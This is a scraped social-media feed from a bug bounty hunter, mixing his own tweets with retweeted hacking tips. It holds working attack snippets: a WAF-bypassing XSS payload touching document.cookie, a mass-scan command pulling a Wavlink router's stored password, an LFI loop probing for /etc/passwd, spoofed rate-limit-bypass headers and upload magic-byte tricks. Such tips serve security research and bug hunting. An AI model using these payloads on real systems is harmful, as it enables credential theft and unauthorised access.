
Chirag Gupta
@chiraggupta8769
Followers
1K
Following
1K
Media
65
Statuses
604
Hacker | Bug Bounty Hunter | Got Acknowledgement From Google, Apple, Microsoft, AT&T, Intel, Oracle, Netgear, Asus, Pinterest.
India
Joined February 2017
RT @Dipu1A: bypassed the registration validation and logged-in with the company email by khaledyasse1882
0
1
0
(XSS) Akamai WAF Bypass.try this payload : . <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>. #bugbountytips #bugbounty.
1
5
10
Wavlink WN530HG4 Password Disclosure 🔥🔥🔥.cat rootDomains.txt | assetfinder -subs-only | httpx -path "/set_safety.shtml?r=52300" -silent -nc -p 443,80,8443,8080,9000,9001,9002,9003,8888 -t 80 -mr "var syspasswd=".#bugbountytips #bugbountytip #bugbounty.
0
1
6
RT @lu3ky13: how I found XSS AND SQL INJECTION . 1 I found text.php.2 I used Arjun to find parameters .3 text.Php?m=1'xss and SQL . done, I….
0
97
0
Top 10 essential tools for Bug-Bounty Hunting :.1. Burp Suite / ZAP-Proxy.2. Google Dorking Script.3. DNS-Discovery.4. Reverse IP Lookup.5. Wapiti.6. INalyzer.7. IronWASP.8. Wfuzz.9. HackBar.10. Nucleii (😜😜).#Security #cybersecuritytips #bugbountytips #BugBounty #bugbountytool.
0
1
5
RT @K0to4m4tsukami: Magic Bytes upload bypass. GIFGIF89a;\x0a.PDF%PDF-.JPG / JPEG\xFF\xD8\xFF\xDB.PNG\x89\x50\x4E\x47\x0D\x0A\x1A\x0A.TAR\….
0
137
0
RT @0xKaran: Collection of some interesting Google dorks.====================.====================. #bugbountytips….
0
156
0
RT @Shubham_pen: Enumeration Cheat Sheet for OSCP. #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam….
0
39
0
RT @hakluke: Here's a flow that works for bug bounty success:. - Pick a popular & complex technology/process.- Learn EVERYTHING about it, i….
0
93
0
RT @HackENews: Sensitive Data leakage using .json. #Hackenews.#bugbounty #cybersecurity #bugbountytips #bugbountytip .
0
61
0
RT @HackENews: (1/2).Some Rate Limit Bypass Headers :. X-Originating-IP: 127.0.0.1.X-Forwarded-For: 127.0.0.1.X-Remote-IP: 127.0.0.1.X-Remo….
0
115
0
RT @Alra3ees: git clone scipag_vulscan. ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan . nmap -sV --….
0
46
0
RT @herry8833: LFI FINDING . cat target.txt | while read url;do ffuf -w payload-lfi.txt -u "$url" -mr root:[x*]:0:0: -or data.txt -v;done….
0
15
0
RT @Helmet_insure: About SHIBh: . Plz keep these in mind. 1 Total supply: 50,000,000,000.2 One and only use of SHIBh: 1SHIB+1SHIBh=0.00000….
0
121
0
RT @intigriti: Hacker problems 😴.zzz. <⌒/ヽ-、___./<_/____/. ̄ ̄ ̄ ̄ ̄ ̄ ̄. ∧_∧ Are my scans. (・ω・) still running?. _|⊃/(___ ./….
0
97
0